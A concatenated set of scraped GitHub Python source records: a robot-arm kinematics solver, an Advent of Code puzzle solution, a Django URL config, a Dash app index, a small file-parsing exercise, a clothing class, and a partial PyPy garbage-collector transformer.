cos(theta + omega -90) + C cos(theta + omega + phi - 180)\n Y <- A sin(theta) + B sin(theta + omega -90) + C sin(theta + omega + phi - 180)\n\"\"\"\n\nclass solver():\n \n def func(self, theta, omega, phi, A=125.0, B=125.0, C=195.0):\n x = y = 0\n ang = theta\n angr = ang / 180 * pi\n x += A * cos(angr)\n y += A * sin(angr)\n ang += omega -90\n angr = ang / 180 * pi\n x += B * cos(angr)\n y += B * sin(angr)\n ang += phi -90\n angr = ang / 180 * pi\n x += C * cos(angr)\n y += C * sin(angr)\n return x, y\n \n \n def GenData(self):\n print('GenData')\n im = Image.new(\"RGBA\", (1000, 1000), (0,0,0,0)) # x , y range\n draw = ImageDraw.Draw( im ) # painter color\n \n loss = Image.new(\"RGBA\", (1000, 1000), (0,0,0,0)) # x , y range\n drawloss = ImageDraw.Draw( loss ) # painter color\n \n def DrawColor(x, y, R, G, B):\n x, y, R, G, B = int(x), int(y), int(R), int(G), int(B)\n \n def vert_loss(theta, omega, phi):\n return abs(theta + omega + phi - 540 + (180 - 60))\n \n def desicion(axis = list, angle = list, cover = False):\n a,b,c,_ = im.getpixel((axis[0],axis[1]))\n vl = vert_loss(angle[0], angle[1], angle[2])\n if cover and vl < vert_loss(a,b,c):\n draw.point([axis[0],axis[1]],fill=(angle[0], angle[1], angle[2], 255))\n drawloss.point([axis[0],axis[1]],fill=(vl, vl, vl, 255))\n elif _ == 0 or ( _ ==250 ):\n draw.point([axis[0],axis[1]],fill=(angle[0], angle[1], angle[2], 250))\n drawloss.point([axis[0],axis[1]],fill=(vl, vl, vl, 255))\n \n desicion([x,y],angle=([R,G,B]), cover = True)\n desicion([x+1,y],angle=([R,G,B]))\n desicion([x-1,y],angle=([R,G,B]))\n desicion([x,y+1],angle=([R,G,B]))\n desicion([x,y-1],angle=([R,G,B]))\n desicion([x+1,y+1],angle=([R,G,B]))\n desicion([x+1,y-1],angle=([R,G,B]))\n desicion([x-1,y+1],angle=([R,G,B]))\n desicion([x-1,y-1],angle=([R,G,B]))\n \n for theta in range(15,165):\n for omega in range(90,180):\n for phi in range(90,180):\n x, y = self.func(theta, omega, phi)\n x = int(x+500)\n y = int(y+500)\n DrawColor(x, y, theta, omega, phi)\n DrawColor(500, 500, 0, 0, 0)\n DrawColor(505, 500, 255, 0, 0)\n DrawColor(500, 505, 0, 255, 0)\n \n im.save( os.path.dirname(os.path.abspath(__file__)) + \"/fileout60.png\")\n loss.save( os.path.dirname(os.path.abspath(__file__)) + \"/loss60.png\")\n \n \n def Calc(self,x_in,y_in,show = True):\n im = Image.open(os.path.dirname(os.path.abspath(__file__)) + \"/fileout.png\")\n x = x_in + 500\n y = y_in + 500\n \n t, o, p, _ = im.getpixel((x,y))\n \n if _ == 0:\n print('[solver] No Solution')\n return 0,0,0\n x, y = self.func(t,o,p)\n \n if show:\n print(f'[solver]\\n target x = {x_in}, target y = {y_in},\\n solver x = {x}, solver y = {y}\\n solution = {t},{o},{p}, error = {pow((x-x_in),2) + pow((y-y_in),2) }')\n return t, o, p\n\nif __name__ == \"__main__\":\n s = solver()\n select = input('input mode:')\n if select == '0':\n s.GenData()\n else:\n select = select.split(' ')","repo_name":"Agenicy/Gomoku-With-Robot-Arm","sub_path":"ESgomoku/Braccio/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"10660912915","text":"lines = map(str.strip, open(\"21.txt\").readlines())\r\n\r\nmonkeys = {}\r\n\r\nfor line in lines:\r\n name = line[:4]\r\n op = line[6:]\r\n if len(op) <= 6:\r\n op = int(op)\r\n monkeys[name] = op\r\n\r\n\r\ndef get(key):\r\n op = monkeys[key]\r\n if type(op) == int:\r\n return op\r\n\r\n # print(op)\r\n x = op[:4]\r\n cmd = op[5]\r\n y = op[7:]\r\n\r\n\r\n if x == \"humn\" or y == \"humn\":\r\n return False\r\n\r\n xx = get(x)\r\n yy = get(y)\r\n\r\n if key == \"root\":\r\n print(xx, yy)\r\n\r\n if type(xx) == bool and xx == False:\r\n return False\r\n if type(yy) == bool and yy == False:\r\n return False\r\n\r\n if cmd == \"+\":\r\n val = xx + yy\r\n if cmd == \"-\":\r\n val = xx - yy\r\n if cmd == \"*\":\r\n val = xx * yy\r\n if cmd == \"/\":\r\n val = xx // yy\r\n\r\n monkeys[key] = val\r\n return val\r\n\r\nfor k in monkeys:\r\n get(k)\r\n\r\nfor k, v in monkeys.items():\r\n if type(v) != int:\r\n print(k, v)\r\n\r\nmonkeys[\"humn\"] = \"HUMN\"\r\n\r\n# reverse instructions\r\n\r\ndef chain(key, val):\r\n op = monkeys[key]\r\n\r\n if type(op) == int:\r\n return op\r\n\r\n x = op[:4]\r\n cmd = op[5]\r\n y = op[7:]\r\n\r\n\r\n if key == \"root\":\r\n cmd = \"=\"\r\n\r\n xx = monkeys[x]\r\n yy = monkeys[y]\r\n\r\n \r\n if type(xx) == int:\r\n print(key, \"=\", x, cmd, y, \"AKA\", val, \"=\", xx, cmd, y)\r\n if type(yy) == int:\r\n print(key, \"=\", x, cmd, y, \"AKA\", val, \"=\", x, cmd, yy)\r\n\r\n if type(xx) != int and type(yy) != int:\r\n print(\"CRAPPPPP\")\r\n\r\n if cmd == \"=\":\r\n if type(xx) == int:\r\n return y, xx\r\n if type(yy) == int:\r\n return x, yy\r\n if cmd == \"+\":\r\n if type(xx) == int:\r\n return y, val - xx\r\n if type(yy) == int:\r\n return x, val - yy\r\n if cmd == \"-\":\r\n if type(xx) == int:\r\n return y, xx - val\r\n if type(yy) == int:\r\n return x, val + yy\r\n if cmd == \"*\":\r\n if type(xx) == int:\r\n return y, val // xx\r\n if type(yy) == int:\r\n return x, val // yy\r\n if cmd == \"/\":\r\n if type(xx) == int:\r\n return y, val * xx\r\n if type(yy) == int:\r\n return x, val * yy\r\n\r\n\r\nkey = \"root\"\r\nval = None\r\nwhile True:\r\n key, val = chain(key, val)\r\n print(key, val)\r\n","repo_name":"koenbot/aoc2022","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38540231552","text":"from .clothing import Clothing\nfrom seasons import ColdWeather, CoolWeather\nfrom departments import Mens, Womens, Youths, Childrens\n\n\nclass Sweater(Clothing, Mens, Womens): # Mix-in strategy for composition\n def __init__(self, name, color, price, material, sku):\n Clothing.__init__(self, name, color, price, material, sku)\n Mens.__init__(self)\n Womens.__init__(self)\n CoolWeather.__init__(self)\n ColdWeather.__init__(self)\n","repo_name":"Nathan-Chevalier/steves-styles","sub_path":"clothes/sweater.py","file_name":"sweater.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25405136473","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport os\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^glove/', include('JhaneGlove.urls', namespace=\"glove\")),\n url(r'^', include('JhaneGlove.urls', namespace=\"glove\")),\n url(r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT }),\n\n\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_URL }),\n url(r'^accounts/', include('registration.urls')),\n url(\"\", include('django_socketio.urls')),\n)\n\nif settings.DEBUG:\n urlpatterns += staticfiles_urlpatterns()\n","repo_name":"OlgaKatzenelson/JhaneGlove","sub_path":"JhaneGlovePyCharm/JhaneGlovePyCharm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2829470117","text":"\n\ndef info(file):\n with open(file, 'r') as f:\n c = f.readlines()\n return c\n \n\ndef get_country_list(arg):\n d = {}\n for el in arg:\n if ':' in el:\n k = el[:-1]\n d[k] = []\n else:\n d[k].append(el[1:-1])\n return d\n\ndef get_country_lenght(arg):\n d = {}\n for k,v in arg.items():\n lenght = 0\n ml = []\n for el in v:\n nl = []\n if el == '':\n continue\n el = el.split('/')\n el[0] = el[0].split('-')\n lenght += int(el[1])\n nl.append(el[0][0])\n nl.append(el[0][1])\n nl.append(el[1])\n ml.append(nl)\n ml.append(lenght)\n d[k] = ml\n return d \n\n\ndef get_ans(inp_1, inp_2, arg):\n d = {}\n for k,v in arg.items(): \n if inp_1.lower() in k.lower() and inp_2.lower() in k.lower():\n inp_ans = input('Where arw you now: ')\n for el in v:\n if type(el) == str:\n if inp_ans.lower() == inp_1:\n traveled = int(v[-1])\n print(f'you have traveled {traveled} km')\n elif inp_ans.lower() == inp_2:\n traveled = 0\n print(f'you have traveled {traveled} km')\n elif inp_ans.lower() == el[0].lower():\n traveled = int(v[-1]) - int(el[-1])\n print(f'you have traveled {traveled} km')\n return d\n\n\n# num = []\n# word = []\n# count = []\n# p = []\n# while True:\n# inp = input(\"Enter something \")\n# if inp == '0':\n# break\n# if inp.isdigit():\n# num.append(inp)\n# num.sort()\n \n # else:\n # word.append(inp)\n # word.sort() \n \n # if inp.isalpha() and len(inp) > 3:\n # count.append(inp) \n \n # if inp[:1] == inp[-1]:\n # p.append(inp)\n \ndef write_file(fname, ml): \n with open(fname, 'w') as f:\n f.write(str(ml)) \n f.close() \n return f\n \n \ndef main(): \n inp_1 = input('1: ')\n inp_2 = input('2: ')\n \n info_file = info('routes.txt')\n country_name = get_country_list(info_file)\n c_len = get_country_lenght(country_name)\n \n print(get_ans(inp_1, inp_2, c_len))\n \n # print(c_len)\n \n # write_file('num.txt', num)\n # write_file('word.txt', word)\n # write_file('count.txt', count)\n # write_file('p.txt', p)\n # print(info('num.txt'))\n # print(info('word.txt'))\n # print(info('count.txt'))\n # print(info('p.txt'))\nprint(main())","repo_name":"lilitstepanyan19/tasks_git","sub_path":"task_2/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15367229165","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Connect to main app.py file\nfrom app import app\nfrom app import server\n\n# Connect to your app pages\nfrom apps import simple_examples, real_life\n# from apps import\n\napp.layout = html.Div([\n dcc.Location(id='url', refresh=False),\n html.Div([\n dcc.Link('Simple examples|', href='/apps/simple_examples'),\n dcc.Link('Real life', href='/apps/real_life'),\n ], className=\"row\"),\n html.Div(id='page-content', children=[])\n], style={\"background\": 'white'})\n\n\n@app.callback(Output('page-content', 'children'),\n [Input('url', 'pathname')])\ndef display_page(pathname):\n if pathname == '/apps/simple_examples':\n return simple_examples.layout\n if pathname == '/apps/real_life':\n return real_life.layout\n else:\n return simple_examples.layout\n\n\nif __name__ == '__main__':\n app.run_server(host=\"0.0.0.0\")\n","repo_name":"bohdanhlovatskyi/strYa","sub_path":"posture_app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"34195010061","text":"from pypy.rpython.memory.gctransform.transform import GCTransformer\nfrom pypy.rpython.memory.gctransform.support import find_gc_ptrs_in_type, \\\n get_rtti, ll_call_destructor, type_contains_pyobjs, var_ispyobj\nfrom pypy.rpython.lltypesystem import lltype, llmemory, rffi, llgroup\nfrom pypy.rpython import rmodel\nfrom pypy.rpython.memory import gctypelayout\nfrom pypy.rpython.memory.gc import marksweep\nfrom pypy.rpython.memory.gcheader import GCHeaderBuilder\nfrom pypy.rlib.rarithmetic import ovfcheck\nfrom pypy.rlib import rgc\nfrom pypy.rlib.objectmodel import we_are_translated\nfrom pypy.translator.backendopt import graphanalyze\nfrom pypy.translator.backendopt.support import var_needsgc\nfrom pypy.translator.backendopt.finalizer import FinalizerAnalyzer\nfrom pypy.annotation import model as annmodel\nfrom pypy.rpython import annlowlevel\nfrom pypy.rpython.rbuiltin import gen_cast\nfrom pypy.rpython.memory.gctypelayout import ll_weakref_deref, WEAKREF\nfrom pypy.rpython.memory.gctypelayout import convert_weakref_to, WEAKREFPTR\nfrom pypy.rpython.memory.gctransform.log import log\nfrom pypy.tool.sourcetools import func_with_new_name\nfrom pypy.rpython.lltypesystem.lloperation import llop, LL_OPERATIONS\nimport sys, types\n\n\nTYPE_ID = llgroup.HALFWORD\n\nclass CollectAnalyzer(graphanalyze.BoolGraphAnalyzer):\n\n def analyze_direct_call(self, graph, seen=None):\n try:\n func = graph.func\n except AttributeError:\n pass\n else:\n if getattr(func, '_gctransformer_hint_cannot_collect_', False):\n return False\n if getattr(func, '_gctransformer_hint_close_stack_', False):\n return True\n return graphanalyze.GraphAnalyzer.analyze_direct_call(self, graph,\n seen)\n def analyze_external_call(self, op, seen=None):\n funcobj = op.args[0].value._obj\n if getattr(funcobj, 'random_effects_on_gcobjs', False):\n return True\n return graphanalyze.GraphAnalyzer.analyze_external_call(self, op,\n seen)\n def analyze_simple_operation(self, op, graphinfo):\n if op.opname in ('malloc', 'malloc_varsize'):\n flags = op.args[1].value\n return flags['flavor'] == 'gc'\n else:\n return (op.opname in LL_OPERATIONS and\n LL_OPERATIONS[op.opname].canmallocgc)\n\ndef find_initializing_stores(collect_analyzer, graph):\n from pypy.objspace.flow.model import mkentrymap\n entrymap = mkentrymap(graph)\n # a bit of a hackish analysis: if a block contains a malloc and check that\n # the result is not zero, then the block following the True link will\n # usually initialize the newly allocated object\n result = set()\n def find_in_block(block, mallocvars):\n for i, op in enumerate(block.operations):\n if op.opname in (\"cast_pointer\", \"same_as\"):\n if op.args[0] in mallocvars:\n mallocvars[op.result] = True\n elif op.opname in (\"setfield\", \"setarrayitem\", \"setinteriorfield\"):\n TYPE = op.args[-1].concretetype\n if (op.args[0] in mallocvars and\n isinstance(TYPE, lltype.Ptr) and\n TYPE.TO._gckind == \"gc\"):\n result.add(op)\n else:\n if collect_analyzer.analyze(op):\n return\n for exit in block.exits:\n if len(entrymap[exit.target]) != 1:\n continue\n newmallocvars = {}\n for i, var in enumerate(exit.args):\n if var in mallocvars:\n newmallocvars[exit.target.inputargs[i]] = True\n if newmallocvars:\n find_in_block(exit.target, newmallocvars)\n mallocnum = 0\n blockset = set(graph.iterblocks())\n while blockset:\n block = blockset.pop()\n if len(block.operations) < 2:\n continue\n mallocop = block.operations[-2]\n checkop = block.operations[-1]\n if not (mallocop.opname == \"malloc\" and\n checkop.opname == \"ptr_nonzero\" and\n mallocop.result is checkop.args[0] and\n block.exitswitch is checkop.result):\n continue\n rtti = get_rtti(mallocop.args[0].value)\n if rtti is not None and hasattr(rtti._obj, 'destructor_funcptr'):\n continue\n exits = [exit for exit in block.exits if exit.llexitcase]\n if len(exits) != 1:\n continue\n exit = exits[0]\n if len(entrymap[exit.target]) != 1:\n continue\n try:\n index = exit.args.index(mallocop.result)\n except ValueError:\n continue\n target = exit.target\n mallocvars = {target.inputargs[index]: True}\n mallocnum += 1\n find_in_block(target, mallocvars)\n #if result:\n # print \"found %s initializing stores in %s\" % (len(result), graph.name)\n return result\n\ndef find_clean_setarrayitems(collect_analyzer, graph):\n result = set()\n for block in graph.iterblocks():\n cache = set()\n for op in block.operations:\n if op.opname == 'getarrayitem':\n cache.add((op.args[0], op.result))\n elif op.opname == 'setarrayitem':\n if (op.args[0], op.args[2]) in cache:\n result.add(op)\n elif collect_analyzer.analyze(op):\n cache = set()\n return result\n\nclass FrameworkGCTransformer(GCTransformer):\n root_stack_depth = None # for tests to override\n\n def __init__(self, translator):\n from pypy.rpython.memory.gc.base import choose_gc_from_config\n from pypy.rpython.memory.gc.base import ARRAY_TYPEID_MAP\n from pypy.rpython.memory.gc import inspector\n\n super(FrameworkGCTransformer, self).__init__(translator, inline=True)\n if hasattr(self, 'GC_PARAMS'):\n # for tests: the GC choice can be specified as class attributes\n from pypy.rpython.memory.gc.marksweep import MarkSweepGC\n GCClass = getattr(self, 'GCClass', MarkSweepGC)\n GC_PARAMS = self.GC_PARAMS\n else:\n # for regular translation: pick the GC from the config\n GCClass, GC_PARAMS = choose_gc_from_config(translator.config)\n\n if hasattr(translator, '_jit2gc'):\n self.layoutbuilder = translator._jit2gc['layoutbuilder']\n else:\n self.layoutbuilder = TransformerLayoutBuilder(translator, GCClass)\n self.layoutbuilder.transformer = self\n self.get_type_id = self.layoutbuilder.get_type_id\n\n # set up GCData with the llgroup from the layoutbuilder, which\n # will grow as more TYPE_INFO members are added to it\n gcdata = gctypelayout.GCData(self.layoutbuilder.type_info_group)\n\n # initialize the following two fields with a random non-NULL address,\n # to make the annotator happy. The fields are patched in finish()\n # to point to a real array.\n foo = lltype.malloc(lltype.FixedSizeArray(llmemory.Address, 1),\n immortal=True, zero=True)\n a_random_address = llmemory.cast_ptr_to_adr(foo)\n gcdata.static_root_start = a_random_address # patched in finish()\n gcdata.static_root_nongcend = a_random_address # patched in finish()\n gcdata.static_root_end = a_random_address # patched in finish()\n gcdata.max_type_id = 13 # patched in finish()\n gcdata.typeids_z = a_random_address # patched in finish()\n self.gcdata = gcdata\n self.malloc_fnptr_cache = {}\n\n gcdata.gc = GCClass(translator.config.translation, **GC_PARAMS)\n root_walker = self.build_root_walker()\n self.root_walker = root_walker\n gcdata.set_query_functions(gcdata.gc)\n gcdata.gc.set_root_walker(root_walker)\n self.num_pushs = 0\n self.write_barrier_calls = 0\n self.write_barrier_from_array_calls = 0\n\n def frameworkgc_setup():\n # run-time initialization code\n root_walker.setup_root_walker()\n gcdata.gc.setup()\n gcdata.gc.post_setup()\n\n def frameworkgc__teardown():\n # run-time teardown code for tests!\n gcdata.gc._teardown()\n\n bk = self.translator.annotator.bookkeeper\n r_typeid16 = rffi.platform.numbertype_to_rclass[TYPE_ID]\n s_typeid16 = annmodel.SomeInteger(knowntype=r_typeid16)\n\n # the point of this little dance is to not annotate\n # self.gcdata.static_root_xyz as constants. XXX is it still needed??\n data_classdef = bk.getuniqueclassdef(gctypelayout.GCData)\n data_classdef.generalize_attr(\n 'static_root_start',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'static_root_nongcend',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'static_root_end',\n annmodel.SomeAddress())\n data_classdef.generalize_attr(\n 'max_type_id',\n annmodel.SomeInteger())\n data_classdef.generalize_attr(\n 'typeids_z',\n annmodel.SomeAddress())\n\n annhelper = annlowlevel.MixLevelHelperAnnotator(self.translator.rtyper)\n\n def getfn(ll_function, args_s, s_result, inline=False,\n minimal_transform=True):\n graph = annhelper.getgraph(ll_function, args_s, s_result)\n if minimal_transform:\n self.need_minimal_transform(graph)\n if inline:\n self.graphs_to_inline[graph] = True\n return annhelper.graph2const(graph)\n\n self.frameworkgc_setup_ptr = getfn(frameworkgc_setup, [],\n annmodel.s_None)\n # for tests\n self.frameworkgc__teardown_ptr = getfn(frameworkgc__teardown, [],\n annmodel.s_None)\n \n if root_walker.need_root_stack:\n self.incr_stack_ptr = getfn(root_walker.incr_stack,\n [annmodel.SomeInteger()],\n annmodel.SomeAddress(),\n inline = True)\n self.decr_stack_ptr = getfn(root_walker.decr_stack,\n [annmodel.SomeInteger()],\n annmodel.SomeAddress(),\n inline = True)\n else:\n self.incr_stack_ptr = None\n self.decr_stack_ptr = None\n self.weakref_deref_ptr = self.inittime_helper(\n ll_weakref_deref, [llmemory.WeakRefPtr], llmemory.Address)\n \n classdef = bk.getuniqueclassdef(GCClass)\n s_gc = annmodel.SomeInstance(classdef)\n s_gcref = annmodel.SomePtr(llmemory.GCREF)\n\n malloc_fixedsize_clear_meth = GCClass.malloc_fixedsize_clear.im_func\n self.malloc_fixedsize_clear_ptr = getfn(\n malloc_fixedsize_clear_meth,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeBool(),\n annmodel.SomeBool(),\n annmodel.SomeBool()], s_gcref,\n inline = False)\n if hasattr(GCClass, 'malloc_fixedsize'):\n malloc_fixedsize_meth = GCClass.malloc_fixedsize.im_func\n self.malloc_fixedsize_ptr = getfn(\n malloc_fixedsize_meth,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeBool(),\n annmodel.SomeBool(),\n annmodel.SomeBool()], s_gcref,\n inline = False)\n else:\n malloc_fixedsize_meth = None\n self.malloc_fixedsize_ptr = self.malloc_fixedsize_clear_ptr\n## self.malloc_varsize_ptr = getfn(\n## GCClass.malloc_varsize.im_func,\n## [s_gc] + [annmodel.SomeInteger(nonneg=True) for i in range(5)]\n## + [annmodel.SomeBool()], s_gcref)\n self.malloc_varsize_clear_ptr = getfn(\n GCClass.malloc_varsize_clear.im_func,\n [s_gc, s_typeid16]\n + [annmodel.SomeInteger(nonneg=True) for i in range(4)], s_gcref)\n self.collect_ptr = getfn(GCClass.collect.im_func,\n [s_gc, annmodel.SomeInteger()], annmodel.s_None)\n self.can_move_ptr = getfn(GCClass.can_move.im_func,\n [s_gc, annmodel.SomeAddress()],\n annmodel.SomeBool())\n\n if hasattr(GCClass, 'shrink_array'):\n self.shrink_array_ptr = getfn(\n GCClass.shrink_array.im_func,\n [s_gc, annmodel.SomeAddress(),\n annmodel.SomeInteger(nonneg=True)], annmodel.s_Bool)\n else:\n self.shrink_array_ptr = None\n\n if hasattr(GCClass, 'assume_young_pointers'):\n # xxx should really be a noop for gcs without generations\n self.assume_young_pointers_ptr = getfn(\n GCClass.assume_young_pointers.im_func,\n [s_gc, annmodel.SomeAddress()],\n annmodel.s_None)\n\n if hasattr(GCClass, 'heap_stats'):\n self.heap_stats_ptr = getfn(GCClass.heap_stats.im_func,\n [s_gc], annmodel.SomePtr(lltype.Ptr(ARRAY_TYPEID_MAP)),\n minimal_transform=False)\n self.get_member_index_ptr = getfn(\n GCClass.get_member_index.im_func,\n [s_gc, annmodel.SomeInteger(knowntype=llgroup.r_halfword)],\n annmodel.SomeInteger())\n\n if hasattr(GCClass, 'writebarrier_before_copy'):\n self.wb_before_copy_ptr = \\\n getfn(GCClass.writebarrier_before_copy.im_func,\n [s_gc] + [annmodel.SomeAddress()] * 2 +\n [annmodel.SomeInteger()] * 3, annmodel.SomeBool())\n elif GCClass.needs_write_barrier:\n raise NotImplementedError(\"GC needs write barrier, but does not provide writebarrier_before_copy functionality\")\n\n # in some GCs we can inline the common case of\n # malloc_fixedsize(typeid, size, False, False, False)\n if getattr(GCClass, 'inline_simple_malloc', False):\n # make a copy of this function so that it gets annotated\n # independently and the constants are folded inside\n if malloc_fixedsize_meth is None:\n malloc_fast_meth = malloc_fixedsize_clear_meth\n self.malloc_fast_is_clearing = True\n else:\n malloc_fast_meth = malloc_fixedsize_meth\n self.malloc_fast_is_clearing = False\n malloc_fast = func_with_new_name(\n malloc_fast_meth,\n \"malloc_fast\")\n s_False = annmodel.SomeBool(); s_False.const = False\n self.malloc_fast_ptr = getfn(\n malloc_fast,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n s_False, s_False, s_False], s_gcref,\n inline = True)\n else:\n self.malloc_fast_ptr = None\n\n # in some GCs we can also inline the common case of\n # malloc_varsize(typeid, length, (3 constant sizes), True, False)\n if getattr(GCClass, 'inline_simple_malloc_varsize', False):\n # make a copy of this function so that it gets annotated\n # independently and the constants are folded inside\n malloc_varsize_clear_fast = func_with_new_name(\n GCClass.malloc_varsize_clear.im_func,\n \"malloc_varsize_clear_fast\")\n s_False = annmodel.SomeBool(); s_False.const = False\n self.malloc_varsize_clear_fast_ptr = getfn(\n malloc_varsize_clear_fast,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True),\n annmodel.SomeInteger(nonneg=True)], s_gcref,\n inline = True)\n else:\n self.malloc_varsize_clear_fast_ptr = None\n\n if getattr(GCClass, 'malloc_varsize_nonmovable', False):\n malloc_nonmovable = func_with_new_name(\n GCClass.malloc_varsize_nonmovable.im_func,\n \"malloc_varsize_nonmovable\")\n self.malloc_varsize_nonmovable_ptr = getfn(\n malloc_nonmovable,\n [s_gc, s_typeid16,\n annmodel.SomeInteger(nonneg=True)], s_gcref)\n else:\n self.malloc_varsize_nonmovable_ptr = None\n\n if getattr(GCClass, 'raw_malloc_memory_pressure', False):\n def raw_malloc_memory_pressure_varsize(length, itemsize):\n totalmem = length * itemsize\n if totalmem > 0:\n gcdata.gc.raw_malloc_memory_pressure(totalmem)\n #else: probably an overflow -- the following rawmalloc\n # will fail then\n def raw_malloc_memory_pressure(sizehint):\n gcdata.gc.raw_malloc_memory_pressure(sizehint)\n self.raw_malloc_memory_pressure_varsize_ptr = getfn(\n raw_malloc_memory_pressure_varsize,\n [annmodel.SomeInteger(), annmodel.SomeInteger()],\n annmodel.s_None, minimal_transform = False)\n self.raw_malloc_memory_pressure_ptr = getfn(\n raw_malloc_memory_pressure,\n [annmodel.SomeInteger()],\n annmodel.s_None, minimal_transform = False)\n\n\n self.identityhash_ptr = getfn(GCClass.identityhash.im_func,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n if getattr(GCClass, 'obtain_free_space', False):\n self.obtainfreespace_ptr = getfn(GCClass.obtain_free_space.im_func,\n [s_gc, annmodel.SomeInteger()],\n annmodel.SomeAddress())\n\n if GCClass.moving_gc:\n self.id_ptr = getfn(GCClass.id.im_func,\n [s_gc, s_gcref], annmodel.SomeInteger(),\n inline = False,\n minimal_transform = False)\n else:\n self.id_ptr = None\n\n self.get_rpy_roots_ptr = getfn(inspector.get_rpy_roots,\n [s_gc],\n rgc.s_list_of_gcrefs(),\n minimal_transform=False)\n self.get_rpy_referents_ptr = getfn(inspector.get_rpy_referents,\n [s_gc, s_gcref],\n rgc.s_list_of_gcrefs(),\n minimal_transform=False)\n self.get_rpy_memory_usage_ptr = getfn(inspector.get_rpy_memory_usage,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n self.get_rpy_type_index_ptr = getfn(inspector.get_rpy_type_index,\n [s_gc, s_gcref],\n annmodel.SomeInteger(),\n minimal_transform=False)\n self.is_rpy_instance_ptr = getfn(inspector.is_rpy_instance,\n [s_gc, s_gcref],\n annmodel.SomeBool(),\n minimal_transform=False)\n self.dump_rpy_heap_ptr = getfn(inspector.dump_rpy_heap,\n [s_gc, annmodel.SomeInteger()],\n annmodel.s_Bool,\n minimal_transform=False)\n self.get_typeids_z_ptr = getfn(inspector.get_typeids_z,\n [s_gc],\n annmodel.SomePtr(\n lltype.Ptr(rgc.ARRAY_OF_CHAR)),\n minimal_transform=False)\n\n self.set_max_heap_size_ptr = getfn(GCClass.set_max_heap_size.im_func,\n [s_gc,\n annmodel.SomeInteger(nonneg=True)],\n annmodel.s_None)\n\n self.write_barrier_ptr = None\n self.write_barrier_from_array_ptr = None\n if GCClass.needs_write_barrier:\n self.write_barrier_ptr = getfn(GCClass.write_barrier.im_func,\n [s_gc,\n annmodel.SomeAddress(),\n annmodel.SomeAddress()],\n annmodel.s_None,\n inline=True)\n func = getattr(gcdata.gc, 'jit_remember_young_pointer', None)\n if func is not None:\n # func should not be a bound method, but a real function\n assert isinstance(func, types.FunctionType)\n self.write_barrier_failing_case_ptr = getfn(func,\n [annmodel.SomeAddress()],\n annmodel.s_None)\n func = getattr(GCClass, 'write_barrier_from_array', None)\n if func is not None:\n self.write_barrier_from_array_ptr = getfn(func.im_func,\n [s_gc,\n annmodel.SomeAddress(),\n annmodel.SomeAddress(),\n annmodel.SomeInteger()],\n annmodel.s_None,\n inline=True)\n func = getattr(gcdata.gc,\n 'jit_remember_young_pointer_from_array',\n None)\n if func is not None:\n # func should not be a bound method, but a real function\n assert isinstance(func, types.FunctionType)\n self.write_barrier_from_array_failing_case_ptr = \\\n getfn(func,\n [annmodel.SomeAddress()],\n annmodel.s_None)\n self.statistics_ptr = getfn(GCClass.statistics.im_func,\n [s_gc, annmodel.SomeInteger()],\n annmodel.SomeInteger())\n\n # thread support\n if translator.config.translation.continuation:\n root_walker.need_stacklet_support(self, getfn)\n if translator.config.translation.thread:\n root_walker.need_thread_support(self, getfn)\n\n self.layoutbuilder.encode_type_shapes_now()\n\n annhelper.finish() # at this point, annotate all mix-level helpers\n annhelper.backend_optimize()\n\n self.collect_analyzer = CollectAnalyzer(self.translator)\n self.collect_analyzer.analyze_all()\n\n s_gc = self.translator.annotator.bookkeeper.valueoftype(GCClass)\n r_gc = self.translator.rtyper.getrepr(s_gc)\n self.c_const_gc = rmodel.inputconst(r_gc, self.gcdata.gc)\n s_gc_data = self.translator.annotator.bookkeeper.valueoftype(\n gctypelayout.GCData)\n r_gc_data = self.translator.rtyper.getrepr(s_gc_data)\n self.c_const_gcdata = rmodel.inputconst(r_gc_data, self.gcdata)\n self.malloc_zero_filled = GCClass.malloc_zero_filled\n\n HDR = self.HDR = self.gcdata.gc.gcheaderbuilder.HDR\n\n size_gc_header = self.gcdata.gc.gcheaderbuilder.size_gc_header\n vtableinfo = (HDR, size_gc_header, self.gcdata.gc.typeid_is_in_field)\n self.c_vtableinfo = rmodel.inputconst(lltype.Void, vtableinfo)\n tig = self.layoutbuilder.type_info_group._as_ptr()\n self.c_type_info_group = rmodel.inputconst(lltype.typeOf(tig), tig)\n sko = llmemory.sizeof(gcdata.TYPE_INFO)\n self.c_vtinfo_skip_offset = rmodel.inputconst(lltype.typeOf(sko), sko)\n\n def build_root_walker(self):\n from pypy.rpython.memory.gctransform import shadowstack\n return 